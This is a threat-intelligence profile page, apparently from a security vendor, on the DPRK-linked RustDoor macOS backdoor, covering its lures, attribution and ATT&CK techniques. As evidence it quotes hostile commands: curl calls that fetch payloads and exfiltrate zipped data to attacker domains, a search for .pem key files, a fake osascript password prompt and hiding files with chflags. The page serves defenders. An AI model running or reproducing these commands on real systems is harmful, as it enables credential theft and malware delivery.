Skip to main content
Mallory
Back to malware
MalwareRansomwareUsed by 3 actors

RustDoor

RustDoor is a Rust-based macOS backdoor, also tracked as ThiefBucket, that has been linked in reporting to North Korean activity, including BlueNoroff / Alluring Pisces / Sapphire Sleet-related campaigns. It has been used in social-engineering operations targeting cryptocurrency users, cryptocurrency-related businesses, and job-seeking software developers in the crypto sector, including LinkedIn recruiter lures, phishing emails with fake cryptocurrency-themed PDF content, and booby-trapped Visual Studio projects. Reporting also describes RustDoor as being delivered via trojanized applications and masquerading as legitimate software or software updates.

Observed behavior includes establishing backdoor access, stealing information, and downloading or executing additional payloads. In one reported campaign, initial execution attempted to download and run RustDoor Mach-O binaries at /Users/$USER$/.zsh_env and /Users/$USER$/Library/VisualStudioHelper from hxxps://apple-ads-metric[.]com/npm, then hide a file named "npm" with chflags hidden. RustDoor also attempted to steal data from the LastPass Chrome extension by archiving Local Extension Settings/aeblfdkhhhdcdjpifhhbdiojplfjncoa and attempted exfiltration to hxxps://visualstudiomacupdate[.]com/tasks/upload_file. The same activity downloaded bash scripts back.sh and sh.sh from apple-ads-metric[.]com intended to open a reverse shell; attempted reverse-shell traffic to 31.41.244[.]92:443 was blocked.

Separate reporting tied related DPRK-attributed macOS activity to RustDoor through code similarity and overlapping targeting. RustDoor has been associated with campaigns targeting cryptocurrency wallet data and host information, and one source notes a wallet targeting set including Ledger, Trezor, Bitcoin Core, Electrum, Exodus, Atomic, and Guarda. SentinelLABS assessed with high confidence that the actor behind the Hidden Risk campaign was the same actor responsible for earlier RustDoor / ThiefBucket and RustBucket activity. High-confidence indicators and infrastructure directly mentioned in the content include apple-ads-metric[.]com, visualstudiomacupdate[.]com, hxxps://apple-ads-metric[.]com/npm, hxxps://visualstudiomacupdate[.]com/tasks/upload_file, and 31.41.244[.]92.

Share:
For your environment

Hunt this family in your stack

Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.

Start free trial
THREAT ACTORS

Groups observed using it

3 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.

View more details
APT38

We assess with high confidence that the same actor is responsible for earlier attacks attributed to BlueNoroff and the RustDoor/ThiefBucket and RustBucket campaigns.

via sentinelone labssentinelone.com
Lazarus

“In this campaign, we discovered a Rust-based macOS malware nicknamed RustDoor masquerading as a legitimate software update…”

via palo alto networks unit 42 blogunit42.paloaltonetworks.com
Alluring Pisces

“In this campaign, we discovered a Rust-based macOS malware nicknamed RustDoor masquerading as a legitimate software update…”

via palo alto networks unit 42 blogunit42.paloaltonetworks.com
MITRE ATT&CK

Techniques & procedures

11 distinct techniques documented for this family, organized by ATT&CK tactic.

Execution

3 techniques
T1059.002AppleScriptEvidence1

The analysis of the script revealed an interesting and uncommon technique, namely to combine Python with Apple Scripting, as the filegrabber() function executes a large block of Apple script using the osascript -e command.

T1059.004Unix ShellEvidence1

"These bash scripts are intended to open a reverse shell connection"; "reverse shell execution attempts to 31.41.244[.]92 ... TCP port 443"

T1204User ExecutionEvidence1

"when executing the fake job interview project within Visual Studio, the malicious code attempts to download and execute two separate Mach-O binaries of RustDoor"

Stealth

1 technique
T1564.001Hidden Files and DirectoriesEvidence1

"chflags hidden npm"

Credential Access

3 techniques
T1056.002GUI Input CaptureEvidence1

"osascript<<EOD display dialog ... 'Please enter password' ... with hidden answer"; "prompted the user to install it and grant it Administrator access"

T1552.004Private KeysEvidence1

"zsh -c mdfind -name .pem"; "SSH configuration files (under $HOME/.ssh)"

T1555.003Credentials from Web BrowsersEvidence1

"Steal LastPass data from Google Chrome's extension for LastPass"; "Browser files"; "Safari files"

Collection

2 techniques
T1056.002GUI Input CaptureEvidence1

"osascript<<EOD display dialog ... 'Please enter password' ... with hidden answer"; "prompted the user to install it and grant it Administrator access"

T1560.001Archive via UtilityEvidence1

"zsh -c zip -r [redacted].zip ..."

Command and Control

2 techniques
T1071.001Web ProtocolsEvidence1

"exfiltrate data to its C2 server"; "HTTP request"; domains "apple-ads-metric[.]com" and "visualstudiomacupdate[.]com"

T1105Ingress Tool TransferEvidence1

"curl -O -s hxxps://apple-ads-metric[.]com/npm"; "curl -O -s hxxps://apple-ads-metric[.]com/back.sh"

Exfiltration

1 technique
T1567Exfiltration Over Web ServiceEvidence1

"curl -F file=[redacted].zip hxxps://visualstudiomacupdate[.]com/tasks/upload_file"; "build an initial HTTP request that exfiltrates..."

ACTIVITY FEED

Recent activity

6 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.

6 SOURCESView more in app
elastic security labsNews
May 22, 2026
PHANTOMPULSE: anatomy of a hijackable blockchain-C2 RAT - Elastic Security Labs

Referenced as a DPRK-attributed macOS malware whose crypto-wallet targeting list closely matches PHANTOMPULSE reconnaissance.

Read more
emsisoftNews
Nov 20, 2025
Mac Specific Threats and Analysis

Rust-written macOS backdoor delivered via trojanized apps; described as linked to ransomware groups and designed to simplify cross-platform development.

Read more
sentinelone labsNews
Apr 11, 2025
BlueNoroff Hidden Risk | Threat Actor Targets Macs with Fake Crypto News and Novel Persistence | SentinelOne

Named malware family/campaign linked in the report to BlueNoroff-associated activity.

Read more
palo alto networks unit 42 blogNews
Feb 26, 2025
RustDoor and Koi Stealer for macOS Used by North Korea-Linked Threat Actor to Target the Cryptocurrency Sector

Rust-based macOS backdoor used in a fake job interview/Visual Studio project infection chain; downloads/executes Mach-O payloads, steals data (e.g., LastPass Chrome extension data), exfiltrates to C2, and downloads scripts intended to establish a reverse shell.

Read more
+2 more in the timeline
What this page doesn’t show

The version that knows your environment.

This page is what’s public. Mallory adds the parts that aren’t: which of your assets match these IOCs, which detections are missing, which campaigns to expect next, and what to do in the next 30 minutes.
Start free trial
IOC matching

Match every observed IP, domain, and hash against your live telemetry.

Threat actor attribution3

Named campaigns wielding this family, with evidence pinned to each claim.

Exploited vulnerabilities

CVEs this family uses for access and lateral movement.

Detection signatures

YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.

MITRE ATT&CK mapping11

Every documented technique, ranked by evidence weight.

Researcher chatter

Reddit, Mastodon, and CTI community discussion around this family.